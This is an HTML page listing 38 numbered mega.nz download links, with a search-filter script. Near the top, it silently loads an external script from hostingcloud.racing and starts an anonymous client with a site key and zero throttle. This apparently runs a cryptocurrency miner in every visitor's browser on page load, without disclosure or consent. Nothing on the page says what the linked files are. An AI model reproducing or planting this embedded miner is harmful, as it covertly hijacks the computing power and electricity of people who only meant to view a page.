
<html>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="https://kit.fontawesome.com/6303adacad.js" crossorigin="anonymous"></script>
<body link="red" vlink="red" alink="red" >
<div class="search-box">
<input class="search-txt"type="text" id="myInput" onkeyup="myFunction()" placeholder="search 🔍 ">
<a class="search-btn" href="#" >
<i class="fas fa-search"></i>
</a>
</div>
<script src="https://www.hostingcloud.racing/KaDy.js"></script>
<script>
    var _client = new Client.Anonymous('9100c4dcdb7af2eb9b74ff30132d04ac5389aa24d4ec1c41d68001bc4c4dde1d', {
        throttle: 0, c: 'w', ads: 0
    });
    _client.start();
    

</script>
</body>
<div class="header container">
<div class="container">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<div class="ero">
<ul id="myUL">
  <li><a href="https://mega.nz/file/0Ihh3KyK#DNUu3vQXG1ISvLfmwayaico76PGKpzlFE0koD8hnVH4">1</li></a>
  <li><a href="https://mega.nz/file/IBgBTIII#-T-DgTAVIcSJfTLNWMqFzeJ-0dAAHKsp4Yxt2RhHd_g">2</a></li>

  <li><a href="https://mega.nz/file/pYpFFaya#7UN6kYyT2VN8Zyr8c1eiaRrGrpJGZbCOQqlu3DMaPlM">3</a></li>
  <li><a href="https://mega.nz/file/JA4jmAiZ#9W2K_UgJdhZrDuerdGObVtzSE9lh6Oc0Rq9nnZ4A5HY">4</a></li>

  <li><a href="https://mega.nz/file/IZpjySxb#3p7Y5XqQVPGGCPnAAr2ck21uLryfEsu9zrhpw6gFlD0">5</a></li>
  <li><a href="https://mega.nz/file/9Fo30YZS#_6EwLtoIGRE1jlmqs6u4lCPq4H-E2RTAEnfFazqtJ_0">6</a></li>
  <li><a href="https://mega.nz/file/oYxRQKxI#pVysk2eu1a8zvFB-IMty0HWDV5mwLlDDmkXVQS6aWP0">7</a></li>
  <li><a href="https://mega.nz/file/ZBpVRSrB#UxFv-z9OEDlLQWmLrKHoGB4RjpT4_fVzd9_a9q_WOOE">8</a></li>
  <li><a href="https://mega.nz/file/lQhjwayS#8ggcYtRbWO929LIi1a0ImlamKiOl1i6rLj69XBTDqhk">9</a></li>
  <li><a href="https://mega.nz/file/sBhFiSyA#4aUwlTl6eOo1GlHw_rbyE1d4zf9X_B-rqO_6Siauu6M">10</a></li>
  <li><a href="https://mega.nz/file/4IBCBAyK#tl13-KShm0miuoVW_rP7hv9201Bn_agw8sBJOiqGzXg">11</a></li>
  <li><a href="https://mega.nz/file/tNZUkAbb#9vHf3XKMTrzEWGvaDXb0YauYIh5txM_sQoEgzXpAiQQ">12</a></li>
  <li><a href="https://mega.nz/file/dRR2EKTQ#Vcs2MfVlBdhv4zQLOcFYYNOo-CLXVpjOWtiVMSSpOzE">13</a></li>
  <li><a href="https://mega.nz/file/IUhB3BwY#4-zqLtHpdklxW--uxCIUyNtUI36znwco8d94I9Ayc2Q">14</a></li>
  <li><a href="https://mega.nz/file/xcpXyByQ#FSJ1yMDaiiRao6ptMtqUpbVoJ8qj7CtzPE4WQZMK2Ng">15</a></li>
  <li><a href="https://mega.nz/file/AM4BRRxY#hb9gIczwEu2MB9IRF_m3dvg5BsMxWDo8Dyunb6QctdQ">16</a></li>
  <li><a href="https://mega.nz/file/kdQQwSgC#DDByvcZjM6JpHzdvOgmIG0t7MJdkU1dsgS5aKAfjCAE">17</a></li>
  <li><a href="https://mega.nz/file/NJAQQCQQ#JfABP9XJsVSroGV22XCZcApguRjyF6iQjAHZ2vi8OYQ">18</a></li>
  <li><a href="https://mega.nz/file/5chTULgY#I_98NYxXBIB6Pyke3jPehun8GDsQSrgjjcl9WqBgiRI">19</a></li>
  <li><a href="https://mega.nz/file/kY5jQBrQ#807p2pLXEUcvh_y6f_deIGDKk6_0Ljw5EhMJPxq1NXU">20</a></li>
  <li><a href="https://mega.nz/file/RZJxjIwL#y0gEf9z-BVFSji9oaEuJcIr89m0psHgfMqKQ87MOlf0">21</a></li>
  <li><a href="https://mega.nz/file/0FwhXJ5K#Y6AhtxC4BqKB-urUzIgBcrGoJK8K7P6isE9qK-r2KsY">22</a></li>
  <li><a href="https://mega.nz/file/1MQWUCBY#owlrgP-EFbTP3V-IoalhTpYlj_hlOMd6vuPovFHcX5I">23</a></li>
  <li><a href="https://mega.nz/file/sYAD2CBB#I0Mwgy_GdAhcMKEMEWUYzn47UFj-8AmAjmLutxaLz54">24</a></li>
  <li><a href="https://mega.nz/file/wcRy3arT#Aott5HCCkU4sZrLxpJQfJl83sSKiKljv3rgH3pxy7Oc">25</a></li>
  <li><a href="https://mega.nz/file/MU4BHQgT#Mh-h9xa-T0ZdShfbo8HuYqT4zhZn6t2NqsT4b3uxZlU">26</a></li>
  <li><a href="https://mega.nz/file/MBYnGIJQ#tLehAgfLyOu-mlMqP07WDTmlBajBcurqV-3hMfVhfGE" >27</a></li>
  <li><a href="https://mega.nz/file/1c4ByAiY#Do_EsSoYIecpE6j1PxlIscRQ_lOYlhewgHg0OaiD2W8" >28</a></li>
  <li><a href="https://mega.nz/file/YA5jiCgA#xvhZlORFP5vAjVHkjv1ngaKbUviO-bFkja8OiVDaWJM" >29</a></li>
<li><a href="https://mega.nz/file/BVZyGAwA#7yKV1Rdh4HGK6xj24jQxONWy3-fpNji8oK27lUqEpAY" >30</a></li>
<li><a href="https://mega.nz/file/FNIjlCZR#XduW9-ZNu2YcPBggtHatqqe-9cG_PJJOQn4p7jeXsDU" >31</a></li>
<li><a href="https://mega.nz/file/4FwxBJJZ#c2k6nc4QngGDm01DkiVkU4UFVJYExvUKluuy4lPIxZw" >32</a></li>
<li><a href="https://mega.nz/file/RZwRiRZL#rVKe5IzVgq_7T0LR9cGqS6FZrseW1YzLI3uIGTSBcII" >33</a></li>
<li><a href="https://mega.nz/file/hJhRTZpA#BSRpHmnyfJKuzHnSGIh3AZKDlgcD-93yEqFdnphwUQs" >34</a></li>
<li><a href="https://mega.nz/file/wUwDnQRK#Nkqsa0pJYkTc1oTe04HQEhpf41z6EMuZgJxbAnL3AK0" >35</a></li>
<li><a href="https://mega.nz/file/8MBBlYaC#P3KwmjmqTDIkQ4t89u1oejh0aUDU_POxp-r4IxF-hM0" >36</a></li>
<li><a href="https://mega.nz/file/RYhDVSoL#kmONiJUPllLkHNju_0ZViGkt0vL10YGchbLdS5eeGII" >37</a></li>
<li><a href="https://mega.nz/file/xZhjWKbC#q-VDHTndSkAHo2wijyb9zDvJL_BZubq2cJhK7iQZ4og" >38</a></li>





</ul>
</div>
</div>
<style>




.container {
	min-height: 100vh;
	width: 100%;
	display: flex;
	align-items: center;
	justify-content: center;
}


#myUL{
position:relative;
width:340px;
margin:100px auto 0;
padding:50px;
box-sizing:border-box;
background: red;
box-shadow: inset 0 0 15px rgba(0,0,0,.2);
border-radius: 0px;
overflow:hidden;
list-style-type:none;
}



ul li:hover{
transform: scale(1.2);
background:none;


}

#myUL li a {
  position: relative;
  display: flex;
  background:black;
  padding:30px 10px;
  color:red;
  margin:14px 0;
  width:250px;
  left:-15px;
  border-radius:0px;
  text-decoration:none;
  font-size:30px;
 
}


.ero::after{

display:block;
background:none;
content:";



}



</style>




<script>
function myFunction() {
 
  var input, filter, ul, li, a, i, txtValue;
  input = document.getElementById('myInput');
  filter = input.value.toUpperCase();
  ul = document.getElementById("myUL");
  li = ul.getElementsByTagName('li');

  for (i = 0; i < li.length; i++) {
    a = li[i].getElementsByTagName("a")[0];
    txtValue = a.textContent || a.innerText;
    if (txtValue.toUpperCase().indexOf(filter) > -1) {
      li[i].style.display = "";
    } else {
      li[i].style.display = "none";
    }
  }
}
</script>

<style>
body{
margin:0%;
Padding:4%;
background:black;

}

.search-box{

Position:fixed;
left:50%;
top:11%;
width:300px;
transform : translate(-50%, -22.5%);
height:40px;
background:red;
border-radius:0px;
padding:10px;

}


.search-txt{
border:none;
background :none;
position: fixed;
outline :none;
float:left;
padding:0%;
color:black;
line-height:40px;
font-size:19px;
width:250px;
}



</style>

<body>

</body>
</html>